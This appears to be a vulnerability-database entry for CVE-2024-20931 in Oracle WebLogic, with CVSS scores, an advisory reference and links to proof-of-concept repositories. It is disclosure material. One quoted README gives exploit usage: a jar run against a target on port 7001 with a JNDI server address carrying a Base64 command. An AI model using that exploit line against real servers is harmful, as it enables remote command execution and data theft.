Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
NA

CVE-2024-20931

Published: 17/02/2024 Updated: 20/02/2024
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Vulnerability Trend

Vendor Advisories

Check Point Security Alerts: Oracle WebLogic Server Information Disclosure (CVE-2024-20931)
Check Point Reference: CPAI-2024-0082 Date Published: 12 Mar 2024 Severity: Critical ...

Github Repositories

https://github.com/GlassyAmadeus/CVE-2024-20931

The Poc for CVE-2024-20931

CVE-2024-20931 The Poc for CVE-2024-20931 Vulnerability Analysis JNDI注入的一种新攻击面-CVE-2024-20931分析

https://github.com/labesterOct/CVE-2024-20931

CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol

🚨 CVE-2024-20931 🚨 CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol A new attack surface for JNDI injection-CVE-2024-20931 analysis introduction In the latest official January 2024 patch released by Oracle, a remote command execution vulnerability CVE-2024-20931 based on the Weblogic T3\IIOP protocol has been fixed This vulnerability was submitted to O

https://github.com/Leocodefocus/CVE-2024-20931-Poc

CVE-2024-20931-Poc

https://github.com/dinosn/CVE-2024-20931

CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839

CVE-2024-20931 CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839 Oracle Weblogic Usage: Setup JNDI, the specific one from githubcom/WhiteHSBG/JNDIExploit/ Exploit: java -jar CVE-2024-20931jar Please input target IP:127001 Please input target port:7001 Please input RMI Address(ip:port/exp):JNDISERVER:1389/Basic/Command/Base64/BASE64COMMAND

References

https://www.oracle.com/security-alerts/cpujan2024.htmlhttps://nvd.nist.govhttps://github.com/GlassyAmadeus/CVE-2024-20931https://advisories.checkpoint.com/defense/advisories/public/2024/cpai-2024-0082.html
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
encryptionCVE-2024-4331CVE-2024-26925arbitrary codeCVE-2006-4304CVE-2024-25458CVE-2024-27077reflected XSSCVE-2024-4059
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook